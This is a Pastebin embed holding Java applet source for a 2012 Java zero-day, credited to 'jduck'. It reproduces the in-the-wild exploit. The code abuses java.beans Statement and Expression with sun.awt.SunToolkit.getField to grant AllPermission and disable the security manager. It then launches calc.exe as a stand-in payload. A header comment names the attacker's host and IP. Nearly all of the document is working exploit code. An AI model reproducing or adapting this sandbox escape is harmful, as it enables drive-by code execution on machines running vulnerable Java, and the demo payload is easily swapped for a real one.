document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. //
  2. // CVE-2012-XXXX Java 0day
  3. //
  4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
  5. //
  6. // secret host / ip : ok.aa24.net / 59.120.154.62
  7. //
  8. // regurgitated by jduck
  9. //
  10. // probably a metasploit module soon...
  11. //
  12. package cve2012xxxx;
  13.  
  14. import java.applet.Applet;
  15. import java.awt.Graphics;
  16. import java.beans.Expression;
  17. import java.beans.Statement;
  18. import java.lang.reflect.Field;
  19. import java.net.URL;
  20. import java.security.*;
  21. import java.security.cert.Certificate;
  22.  
  23. public class Gondvv extends Applet
  24. {
  25.  
  26.     public Gondvv()
  27.     {
  28.     }
  29.  
  30.     public void disableSecurity()
  31.         throws Throwable
  32.     {
  33.         Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
  34.         Permissions localPermissions = new Permissions();
  35.         localPermissions.add(new AllPermission());
  36.         ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
  37.         AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
  38.             localProtectionDomain
  39.         });
  40.         SetField(Statement.class, "acc", localStatement, localAccessControlContext);
  41.         localStatement.execute();
  42.     }
  43.  
  44.     private Class GetClass(String paramString)
  45.         throws Throwable
  46.     {
  47.         Object arrayOfObject[] = new Object[1];
  48.         arrayOfObject[0] = paramString;
  49.         Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
  50.         localExpression.execute();
  51.         return (Class)localExpression.getValue();
  52.     }
  53.  
  54.     private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
  55.         throws Throwable
  56.     {
  57.         Object arrayOfObject[] = new Object[2];
  58.         arrayOfObject[0] = paramClass;
  59.         arrayOfObject[1] = paramString;
  60.         Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
  61.         localExpression.execute();
  62.         ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
  63.     }
  64.  
  65.     public void init()
  66.     {
  67.         try
  68.         {
  69.             disableSecurity();
  70.             Process localProcess = null;
  71.             localProcess = Runtime.getRuntime().exec("calc.exe");
  72.             if(localProcess != null);
  73.                localProcess.waitFor();
  74.         }
  75.         catch(Throwable localThrowable)
  76.         {
  77.             localThrowable.printStackTrace();
  78.         }
  79.     }
  80.  
  81.     public void paint(Graphics paramGraphics)
  82.     {
  83.         paramGraphics.drawString("Loading", 50, 25);
  84.     }
  85. }
');